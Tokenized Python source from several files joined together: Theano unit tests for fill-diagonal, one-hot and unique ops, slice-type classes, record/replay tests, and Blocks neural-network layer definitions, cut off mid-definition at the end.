numpy . allclose ( numpy . diag ( out ) , val ) <EOL> assert ( out == val ) . sum ( ) == min ( a . shape ) <EOL> a = numpy . random . rand ( <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> ) . astype ( config . floatX ) <EOL> x = tensor . tensor3 ( ) <EOL> y = tensor . scalar ( ) <EOL> f = function ( [ x , y ] , fill_diagonal ( x , y ) ) <EOL> val = numpy . cast [ config . floatX ] ( numpy . random . rand ( ) + <NUM_LIT:10> ) <EOL> out = f ( a , val ) <EOL> assert out [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] == val <EOL> assert out [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] == val <EOL> assert out [ <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ] == val <EOL> assert ( out == val ) . sum ( ) == min ( a . shape ) <EOL> @ attr ( '<STR_LIT>' ) <EOL> def test_gradient ( self ) : <EOL> utt . verify_grad ( fill_diagonal , [ numpy . random . rand ( <NUM_LIT:5> , <NUM_LIT:8> ) , <EOL> numpy . random . rand ( ) ] , <EOL> n_tests = <NUM_LIT:1> , rng = TestFillDiagonal . rng ) <EOL> utt . verify_grad ( fill_diagonal , [ numpy . random . rand ( <NUM_LIT:8> , <NUM_LIT:5> ) , <EOL> numpy . random . rand ( ) ] , <EOL> n_tests = <NUM_LIT:1> , rng = TestFillDiagonal . rng ) <EOL> def test_infer_shape ( self ) : <EOL> z = tensor . dtensor3 ( ) <EOL> x = tensor . dmatrix ( ) <EOL> y = tensor . dscalar ( ) <EOL> self . _compile_and_check ( [ x , y ] , [ self . op ( x , y ) ] , <EOL> [ numpy . random . rand ( <NUM_LIT:8> , <NUM_LIT:5> ) , <EOL> numpy . random . rand ( ) ] , <EOL> self . op_class ) <EOL> self . _compile_and_check ( [ z , y ] , [ self . op ( z , y ) ] , <EOL> [ numpy . random . rand ( <NUM_LIT:8> , <NUM_LIT:8> , <NUM_LIT:8> ) , <EOL> numpy . random . rand ( ) ] , <EOL> self . op_class , <EOL> warn = False ) <EOL> class TestFillDiagonalOffset ( utt . InferShapeTester ) : <EOL> rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> def setUp ( self ) : <EOL> super ( TestFillDiagonalOffset , self ) . setUp ( ) <EOL> self . op_class = FillDiagonalOffset <EOL> self . op = fill_diagonal_offset <EOL> def test_perform ( self ) : <EOL> x = tensor . matrix ( ) <EOL> y = tensor . scalar ( ) <EOL> z = tensor . iscalar ( ) <EOL> f = function ( [ x , y , z ] , fill_diagonal_offset ( x , y , z ) ) <EOL> for test_offset in ( - <NUM_LIT:5> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) : <EOL> for shp in [ ( <NUM_LIT:8> , <NUM_LIT:8> ) , ( <NUM_LIT:5> , <NUM_LIT:8> ) , ( <NUM_LIT:8> , <NUM_LIT:5> ) , ( <NUM_LIT:5> , <NUM_LIT:5> ) ] : <EOL> a = numpy . random . rand ( * shp ) . astype ( config . floatX ) <EOL> val = numpy . cast [ config . floatX ] ( numpy . random . rand ( ) ) <EOL> out = f ( a , val , test_offset ) <EOL> assert numpy . allclose ( numpy . diag ( out , test_offset ) , val ) <EOL> if test_offset >= <NUM_LIT:0> : <EOL> assert ( out == val ) . sum ( ) == min ( min ( a . shape ) , <EOL> a . shape [ <NUM_LIT:1> ] - test_offset ) <EOL> else : <EOL> assert ( out == val ) . sum ( ) == min ( min ( a . shape ) , <EOL> a . shape [ <NUM_LIT:0> ] + test_offset ) <EOL> def test_gradient ( self ) : <EOL> for test_offset in ( - <NUM_LIT:5> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) : <EOL> def fill_diagonal_with_fix_offset ( a , val ) : <EOL> return fill_diagonal_offset ( a , val , test_offset ) <EOL> utt . verify_grad ( fill_diagonal_with_fix_offset , <EOL> [ numpy . random . rand ( <NUM_LIT:5> , <NUM_LIT:8> ) , numpy . random . rand ( ) ] , <EOL> n_tests = <NUM_LIT:1> , rng = TestFillDiagonalOffset . rng ) <EOL> utt . verify_grad ( fill_diagonal_with_fix_offset , <EOL> [ numpy . random . rand ( <NUM_LIT:8> , <NUM_LIT:5> ) , numpy . random . rand ( ) ] , <EOL> n_tests = <NUM_LIT:1> , rng = TestFillDiagonalOffset . rng ) <EOL> utt . verify_grad ( fill_diagonal_with_fix_offset , <EOL> [ numpy . random . rand ( <NUM_LIT:5> , <NUM_LIT:5> ) , numpy . random . rand ( ) ] , <EOL> n_tests = <NUM_LIT:1> , rng = TestFillDiagonalOffset . rng ) <EOL> def test_infer_shape ( self ) : <EOL> x = tensor . dmatrix ( ) <EOL> y = tensor . dscalar ( ) <EOL> z = tensor . iscalar ( ) <EOL> for test_offset in ( - <NUM_LIT:5> , - <NUM_LIT:4> , - <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:4> , <NUM_LIT:5> ) : <EOL> self . _compile_and_check ( [ x , y , z ] , [ self . op ( x , y , z ) ] , <EOL> [ numpy . random . rand ( <NUM_LIT:8> , <NUM_LIT:5> ) , <EOL> numpy . random . rand ( ) , <EOL> test_offset ] , <EOL> self . op_class ) <EOL> self . _compile_and_check ( [ x , y , z ] , [ self . op ( x , y , z ) ] , <EOL> [ numpy . random . rand ( <NUM_LIT:5> , <NUM_LIT:8> ) , <EOL> numpy . random . rand ( ) , <EOL> test_offset ] , <EOL> self . op_class ) <EOL> def test_to_one_hot ( ) : <EOL> v = theano . tensor . ivector ( ) <EOL> o = to_one_hot ( v , <NUM_LIT:10> ) <EOL> f = theano . function ( [ v ] , o ) <EOL> out = f ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:6> ] ) <EOL> assert out . dtype == theano . config . floatX <EOL> assert numpy . allclose ( <EOL> out , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) <EOL> v = theano . tensor . ivector ( ) <EOL> o = to_one_hot ( v , <NUM_LIT:10> , dtype = "<STR_LIT>" ) <EOL> f = theano . function ( [ v ] , o ) <EOL> out = f ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:6> ] ) <EOL> assert out . dtype == "<STR_LIT>" <EOL> assert numpy . allclose ( <EOL> out , <EOL> [ [ <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] , <EOL> [ <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:1.> , <NUM_LIT:0.> , <NUM_LIT:0.> , <NUM_LIT:0.> ] ] ) <EOL> class test_Unique ( utt . InferShapeTester ) : <EOL> def setUp ( self ) : <EOL> super ( test_Unique , self ) . setUp ( ) <EOL> self . op_class = Unique <EOL> self . ops = [ Unique ( ) , <EOL> Unique ( True ) , <EOL> Unique ( False , True ) , <EOL> Unique ( True , True ) ] <EOL> if bool ( numpy_ver >= [ <NUM_LIT:1> , <NUM_LIT:9> ] ) : <EOL> self . ops . extend ( [ <EOL> Unique ( False , False , True ) , <EOL> Unique ( True , False , True ) , <EOL> Unique ( False , True , True ) , <EOL> Unique ( True , True , True ) ] ) <EOL> def test_basic_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> x = theano . tensor . vector ( ) <EOL> inp = np . asarray ( [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> ] , dtype = config . floatX ) <EOL> list_outs_expected = [ [ np . unique ( inp ) ] , <EOL> np . unique ( inp , True ) , <EOL> np . unique ( inp , False , True ) , <EOL> np . unique ( inp , True , True ) ] <EOL> if bool ( numpy_ver >= [ <NUM_LIT:1> , <NUM_LIT:9> ] ) : <EOL> list_outs_expected . extend ( [ <EOL> np . unique ( inp , False , False , True ) , <EOL> np . unique ( inp , True , False , True ) , <EOL> np . unique ( inp , False , True , True ) , <EOL> np . unique ( inp , True , True , True ) ] ) <EOL> for op , outs_expected in zip ( self . ops , list_outs_expected ) : <EOL> f = theano . function ( inputs = [ x ] , outputs = op ( x , return_list = True ) ) <EOL> outs = f ( inp ) <EOL> for out , out_exp in zip ( outs , outs_expected ) : <EOL> utt . assert_allclose ( out , out_exp ) <EOL> def test_basic_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> x = theano . tensor . matrix ( ) <EOL> inp = np . asarray ( [ [ <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] , dtype = config . floatX ) <EOL> list_outs_expected = [ [ np . unique ( inp ) ] , <EOL> np . unique ( inp , True ) , <EOL> np . unique ( inp , False , True ) , <EOL> np . unique ( inp , True , True ) ] <EOL> if bool ( numpy_ver >= [ <NUM_LIT:1> , <NUM_LIT:9> ] ) : <EOL> list_outs_expected . extend ( [ <EOL> np . unique ( inp , False , False , True ) , <EOL> np . unique ( inp , True , False , True ) , <EOL> np . unique ( inp , False , True , True ) , <EOL> np . unique ( inp , True , True , True ) ] ) <EOL> for op , outs_expected in zip ( self . ops , list_outs_expected ) : <EOL> f = theano . function ( inputs = [ x ] , outputs = op ( x , return_list = True ) ) <EOL> outs = f ( inp ) <EOL> for out , out_exp in zip ( outs , outs_expected ) : <EOL> utt . assert_allclose ( out , out_exp ) <EOL> def test_infer_shape_vector ( self ) : <EOL> """<STR_LIT>""" <EOL> x = theano . tensor . vector ( ) <EOL> for op in self . ops : <EOL> if not op . return_inverse : <EOL> continue <EOL> if op . return_index : <EOL> f = op ( x ) [ <NUM_LIT:2> ] <EOL> else : <EOL> f = op ( x ) [ <NUM_LIT:1> ] <EOL> self . _compile_and_check ( [ x ] , <EOL> [ f ] , <EOL> [ np . asarray ( np . array ( [ <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:2> ] ) , <EOL> dtype = config . floatX ) ] , <EOL> self . op_class ) <EOL> def test_infer_shape_matrix ( self ) : <EOL> """<STR_LIT>""" <EOL> x = theano . tensor . matrix ( ) <EOL> for op in self . ops : <EOL> if not op . return_inverse : <EOL> continue <EOL> if op . return_index : <EOL> f = op ( x ) [ <NUM_LIT:2> ] <EOL> else : <EOL> f = op ( x ) [ <NUM_LIT:1> ] <EOL> self . _compile_and_check ( [ x ] , <EOL> [ f ] , <EOL> [ np . asarray ( np . array ( [ [ <NUM_LIT:2> , <NUM_LIT:1> ] , [ <NUM_LIT:3> , <NUM_LIT:2> ] , [ <NUM_LIT:2> , <NUM_LIT:3> ] ] ) , <EOL> dtype = config . floatX ) ] , <EOL> self . op_class ) </s>
<s> import numpy <EOL> import theano <EOL> from theano . gof import Apply , Constant , Generic , Op , Type , hashtype <EOL> from theano . gradient import DisconnectedType <EOL> def as_int_none_variable ( x ) : <EOL> if x is None : <EOL> return NoneConst <EOL> elif NoneConst . equals ( x ) : <EOL> return x <EOL> x = theano . tensor . as_tensor_variable ( x , ndim = <NUM_LIT:0> ) <EOL> if x . type . dtype [ : <NUM_LIT:3> ] not in ( '<STR_LIT:int>' , '<STR_LIT>' ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return x <EOL> class MakeSlice ( Op ) : <EOL> __props__ = ( ) <EOL> def make_node ( self , slc , stop = None , step = None ) : <EOL> if isinstance ( slc , slice ) : <EOL> assert stop is None <EOL> assert step is None <EOL> inp = [ slc . start , slc . stop , slc . step ] <EOL> else : <EOL> inp = [ slc , stop , step ] <EOL> return Apply ( self , <EOL> list ( map ( as_int_none_variable , inp ) ) , <EOL> [ slicetype ( ) ] ) <EOL> def perform ( self , node , inp , out_ ) : <EOL> out , = out_ <EOL> out [ <NUM_LIT:0> ] = slice ( * inp ) <EOL> def grad ( self , inputs , grads ) : <EOL> return [ DisconnectedType ( ) ( ) for i in inputs ] <EOL> make_slice = MakeSlice ( ) <EOL> class SliceType ( Type ) : <EOL> def filter ( self , x , strict = False , allow_downcast = None ) : <EOL> if isinstance ( x , slice ) : <EOL> return x <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" <EOL> def __eq__ ( self , other ) : <EOL> return type ( self ) == type ( other ) <EOL> def __hash__ ( self ) : <EOL> return hashtype ( self ) <EOL> @ staticmethod <EOL> def may_share_memory ( a , b ) : <EOL> return isinstance ( a , slice ) and a is b <EOL> slicetype = SliceType ( ) <EOL> class SliceConstant ( Constant ) : <EOL> def __init__ ( self , type , data , name = None ) : <EOL> assert isinstance ( data , slice ) <EOL> if isinstance ( data . start , numpy . ndarray ) : <EOL> assert data . start . ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . start . dtype ) <EOL> data = slice ( int ( data . start ) , data . stop , data . step ) <EOL> elif isinstance ( data . stop , numpy . ndarray ) : <EOL> assert data . stop . ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . stop . dtype ) <EOL> data = slice ( data . start , int ( data . stop ) , data . step ) <EOL> elif isinstance ( data . step , numpy . ndarray ) : <EOL> assert data . step . ndim == <NUM_LIT:0> <EOL> assert "<STR_LIT:int>" in str ( data . step . dtype ) <EOL> data = slice ( data . start , int ( data . stop ) , data . step ) <EOL> Constant . __init__ ( self , type , data , name ) <EOL> def signature ( self ) : <EOL> return ( SliceConstant , self . data . start , self . data . stop , self . data . step ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . __class__ . __name__ , <EOL> self . data . start , <EOL> self . data . stop , <EOL> self . data . step ) <EOL> SliceType . Constant = SliceConstant <EOL> class NoneTypeT ( Generic ) : <EOL> """<STR_LIT>""" <EOL> def filter ( self , x , strict = False , allow_downcast = None ) : <EOL> if x is None : <EOL> return x <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> @ staticmethod <EOL> def may_share_memory ( a , b ) : <EOL> return False <EOL> none_type_t = NoneTypeT ( ) <EOL> NoneConst = Constant ( none_type_t , None , name = '<STR_LIT>' ) </s>
<s> from theano . tests . record import * <EOL> from theano import function <EOL> from six . moves import xrange , StringIO <EOL> from theano . tensor import iscalar <EOL> def test_record_good ( ) : <EOL> """<STR_LIT>""" <EOL> output = StringIO ( ) <EOL> recorder = Record ( file_object = output , replay = False ) <EOL> num_lines = <NUM_LIT:10> <EOL> for i in xrange ( num_lines ) : <EOL> recorder . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> output_value = output . getvalue ( ) <EOL> assert output_value == '<STR_LIT>' . join ( str ( i ) + '<STR_LIT:\n>' for i in xrange ( num_lines ) ) <EOL> output = StringIO ( output_value ) <EOL> playback_checker = Record ( file_object = output , replay = True ) <EOL> for i in xrange ( num_lines ) : <EOL> playback_checker . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> def test_record_bad ( ) : <EOL> """<STR_LIT>""" <EOL> output = StringIO ( ) <EOL> recorder = Record ( file_object = output , replay = False ) <EOL> num_lines = <NUM_LIT:10> <EOL> for i in xrange ( num_lines ) : <EOL> recorder . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> output_value = output . getvalue ( ) <EOL> output = StringIO ( output_value ) <EOL> playback_checker = Record ( file_object = output , replay = True ) <EOL> for i in xrange ( num_lines // <NUM_LIT:2> ) : <EOL> playback_checker . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> try : <EOL> playback_checker . handle_line ( '<STR_LIT>' ) <EOL> except MismatchError : <EOL> return <EOL> raise AssertionError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_record_mode_good ( ) : <EOL> """<STR_LIT>""" <EOL> output = StringIO ( ) <EOL> recorder = Record ( file_object = output , replay = False ) <EOL> record_mode = RecordMode ( recorder ) <EOL> i = iscalar ( ) <EOL> f = function ( [ i ] , i , mode = record_mode , name = '<STR_LIT:f>' ) <EOL> num_lines = <NUM_LIT:10> <EOL> for i in xrange ( num_lines ) : <EOL> recorder . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> f ( i ) <EOL> output_value = output . getvalue ( ) <EOL> output = StringIO ( output_value ) <EOL> playback_checker = Record ( file_object = output , replay = True ) <EOL> playback_mode = RecordMode ( playback_checker ) <EOL> i = iscalar ( ) <EOL> f = function ( [ i ] , i , mode = playback_mode , name = '<STR_LIT:f>' ) <EOL> for i in xrange ( num_lines ) : <EOL> playback_checker . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> f ( i ) <EOL> def test_record_mode_bad ( ) : <EOL> """<STR_LIT>""" <EOL> output = StringIO ( ) <EOL> recorder = Record ( file_object = output , replay = False ) <EOL> record_mode = RecordMode ( recorder ) <EOL> i = iscalar ( ) <EOL> f = function ( [ i ] , i , mode = record_mode , name = '<STR_LIT:f>' ) <EOL> num_lines = <NUM_LIT:10> <EOL> for i in xrange ( num_lines ) : <EOL> recorder . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> f ( i ) <EOL> output_value = output . getvalue ( ) <EOL> output = StringIO ( output_value ) <EOL> playback_checker = Record ( file_object = output , replay = True ) <EOL> playback_mode = RecordMode ( playback_checker ) <EOL> i = iscalar ( ) <EOL> f = function ( [ i ] , i , mode = playback_mode , name = '<STR_LIT:f>' ) <EOL> for i in xrange ( num_lines // <NUM_LIT:2> ) : <EOL> playback_checker . handle_line ( str ( i ) + '<STR_LIT:\n>' ) <EOL> f ( i ) <EOL> try : <EOL> f ( <NUM_LIT:0> ) <EOL> except MismatchError : <EOL> return <EOL> raise AssertionError ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> from theano import tensor <EOL> from blocks . bricks . base import application , Brick , lazy <EOL> from blocks . bricks . interfaces import Activation , Feedforward , Initializable <EOL> from blocks . bricks . interfaces import LinearLike , Random <EOL> from blocks . bricks . wrappers import WithExtraDims <EOL> from blocks . roles import add_role , WEIGHT , BIAS <EOL> from blocks . utils import shared_floatx_nans <EOL> logger = logging . getLogger ( __name__ ) <EOL> class Linear ( LinearLike , Feedforward ) : <EOL> r"""<STR_LIT>""" <EOL> @ lazy ( allocation = [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def __init__ ( self , input_dim , output_dim , ** kwargs ) : <EOL> super ( Linear , self ) . __init__ ( ** kwargs ) <EOL> self . input_dim = input_dim <EOL> self . output_dim = output_dim <EOL> def _allocate ( self ) : <EOL> W = shared_floatx_nans ( ( self . input_dim , self . output_dim ) , name = '<STR_LIT>' ) <EOL> add_role ( W , WEIGHT ) <EOL> self . parameters . append ( W ) <EOL> self . add_auxiliary_variable ( W . norm ( <NUM_LIT:2> ) , name = '<STR_LIT>' ) <EOL> if self . use_bias : <EOL> b = shared_floatx_nans ( ( self . output_dim , ) , name = '<STR_LIT:b>' ) <EOL> add_role ( b , BIAS ) <EOL> self . parameters . append ( b ) <EOL> self . add_auxiliary_variable ( b . norm ( <NUM_LIT:2> ) , name = '<STR_LIT>' ) <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> output = tensor . dot ( input_ , self . W ) <EOL> if self . use_bias : <EOL> output += self . b <EOL> return output <EOL> def get_dim ( self , name ) : <EOL> if name == '<STR_LIT>' : <EOL> return self . input_dim <EOL> if name == '<STR_LIT>' : <EOL> return self . output_dim <EOL> super ( Linear , self ) . get_dim ( name ) <EOL> class Bias ( Feedforward , Initializable ) : <EOL> """<STR_LIT>""" <EOL> @ lazy ( allocation = [ '<STR_LIT>' ] ) <EOL> def __init__ ( self , dim , ** kwargs ) : <EOL> super ( Bias , self ) . __init__ ( ** kwargs ) <EOL> self . dim = dim <EOL> def _allocate ( self ) : <EOL> b = shared_floatx_nans ( ( self . output_dim , ) , name = '<STR_LIT:b>' ) <EOL> add_role ( b , BIAS ) <EOL> self . parameters . append ( b ) <EOL> def _initialize ( self ) : <EOL> b , = self . parameters <EOL> self . biases_init . initialize ( b , self . rng ) <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> b , = self . parameters <EOL> return input_ + b <EOL> def get_dim ( self , name ) : <EOL> if name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . dim <EOL> super ( Bias , self ) . get_dim ( name ) <EOL> def _get_dim ( self ) : <EOL> return self . dim <EOL> def _set_dim ( self , value ) : <EOL> self . dim = value <EOL> input_dim = output_dim = property ( _get_dim , _set_dim ) <EOL> class Maxout ( Brick ) : <EOL> """<STR_LIT>""" <EOL> @ lazy ( allocation = [ '<STR_LIT>' ] ) <EOL> def __init__ ( self , num_pieces , ** kwargs ) : <EOL> super ( Maxout , self ) . __init__ ( ** kwargs ) <EOL> self . num_pieces = num_pieces <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> last_dim = input_ . shape [ - <NUM_LIT:1> ] <EOL> output_dim = last_dim // self . num_pieces <EOL> new_shape = ( [ input_ . shape [ i ] for i in range ( input_ . ndim - <NUM_LIT:1> ) ] + <EOL> [ output_dim , self . num_pieces ] ) <EOL> output = tensor . max ( input_ . reshape ( new_shape , ndim = input_ . ndim + <NUM_LIT:1> ) , <EOL> axis = input_ . ndim ) <EOL> return output <EOL> class LinearMaxout ( Initializable , Feedforward ) : <EOL> """<STR_LIT>""" <EOL> @ lazy ( allocation = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def __init__ ( self , input_dim , output_dim , num_pieces , ** kwargs ) : <EOL> super ( LinearMaxout , self ) . __init__ ( ** kwargs ) <EOL> self . linear = Linear ( ) <EOL> self . maxout = Maxout ( ) <EOL> self . children = [ self . linear , <EOL> self . maxout ] <EOL> self . input_dim = input_dim <EOL> self . output_dim = output_dim <EOL> self . num_pieces = num_pieces <EOL> @ property <EOL> def input_dim ( self ) : <EOL> return self . linear . input_dim <EOL> @ input_dim . setter <EOL> def input_dim ( self , value ) : <EOL> self . linear . input_dim = value <EOL> def _push_allocation_config ( self ) : <EOL> self . linear . output_dim = self . output_dim * self . num_pieces <EOL> self . maxout . num_pieces = self . num_pieces <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> pre_activation = self . linear . apply ( input_ ) <EOL> output = self . maxout . apply ( pre_activation ) <EOL> return output <EOL> class Identity ( Activation ) : <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> return input_ <EOL> class Tanh ( Activation ) : <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> return tensor . tanh ( input_ ) <EOL> class Logistic ( Activation ) : <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> return tensor . nnet . sigmoid ( input_ ) <EOL> class Softplus ( Activation ) : <EOL> r"""<STR_LIT>""" <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> return tensor . nnet . softplus ( input_ ) <EOL> class Rectifier ( Activation ) : <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> return tensor . switch ( input_ > <NUM_LIT:0> , input_ , <NUM_LIT:0> ) <EOL> class Softmax ( Brick ) : <EOL> """<STR_LIT>""" <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def apply ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> return tensor . nnet . softmax ( input_ ) <EOL> @ application ( inputs = [ '<STR_LIT>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def log_probabilities ( self , input_ ) : <EOL> """<STR_LIT>""" <EOL> shifted = input_ - input_ . max ( axis = <NUM_LIT:1> , keepdims = True ) <EOL> return shifted - tensor . log ( <EOL> tensor . exp ( shifted ) . sum ( axis = <NUM_LIT:1> , keepdims = True ) ) <EOL> @ application ( inputs = [ '<STR_LIT:y>' , '<STR_LIT:x>' ] , outputs = [ '<STR_LIT>' ] ) <EOL> def categorical_cross_entropy ( self , application_call , y , x ) : <EOL> """<STR_LIT>""" <EOL> x = self . log_probabilities ( x ) <EOL> application_call . add_auxiliary_variable ( <EOL> x . copy ( name = '<STR_LIT>' ) ) <EOL> if y . ndim == x . ndim - <NUM_LIT:1> : <EOL> indices = tensor . arange ( y . shape [ <NUM_LIT:0> ] ) * x . shape [ <NUM_LIT:1> ] + y <EOL> cost = - x . flatten ( ) [ indices ] <EOL> elif y . ndim == x . ndim : <EOL> cost = - ( x * y ) . sum ( axis = <NUM_LIT:1> ) <EOL> else : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> return cost <EOL> class NDimensionalSoftmax ( Softmax ) : <EOL> decorators = [ WithExtraDims ( ) ] </s>
<s> from fuel . datasets . base import ( Dataset , IterableDataset , <EOL> IndexableDataset ) <EOL> from fuel . datasets . hdf5 import H5PYDataset <EOL> from fuel . datasets . adult import Adult <EOL> from fuel . datasets . binarized_mnist import BinarizedMNIST <EOL> from fuel . datasets . cifar10 import CIFAR10 <EOL> from fuel . datasets . cifar100 import CIFAR100 <EOL> from fuel . datasets . caltech101_silhouettes import CalTech101Silhouettes <EOL> from fuel . datasets . iris import Iris <EOL> from fuel . datasets . mnist import MNIST <EOL> from fuel . datasets . svhn import SVHN <EOL> from fuel . datasets . text import TextFile <EOL> from fuel . datasets . billion import OneBillionWord </s>
<s> from theano import tensor <EOL> from theano . tensor . nnet import conv2d <EOL> def weights_std ( weights , mask_outputs = None ) : <EOL> positions = tensor . arange ( weights . shape [ <NUM_LIT:2> ] ) <EOL> expected = ( weights * positions ) . sum ( axis = <NUM_LIT:2> ) <EOL> expected2 = ( weights * positions ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:2> ) <EOL> result = ( expected2 - expected ** <NUM_LIT:2> ) ** <NUM_LIT:0.5> <EOL> if mask_outputs : <EOL> result *= mask_outputs <EOL> return result . sum ( ) / weights . shape [ <NUM_LIT:0> ] <EOL> def monotonicity_penalty ( weights , mask_x = None ) : <EOL> cumsums = tensor . cumsum ( weights , axis = <NUM_LIT:2> ) <EOL> penalties = tensor . maximum ( cumsums [ <NUM_LIT:1> : ] - cumsums [ : - <NUM_LIT:1> ] , <NUM_LIT:0> ) . sum ( axis = <NUM_LIT:2> ) <EOL> if mask_x : <EOL> penalties *= mask_x [ <NUM_LIT:1> : ] <EOL> return penalties . sum ( ) <EOL> def entropy ( weights , mask_x ) : <EOL> entropies = ( weights * tensor . log ( weights + <NUM_LIT> ) ) . sum ( axis = <NUM_LIT:2> ) <EOL> entropies *= mask_x <EOL> return entropies . sum ( ) <EOL> def conv1d 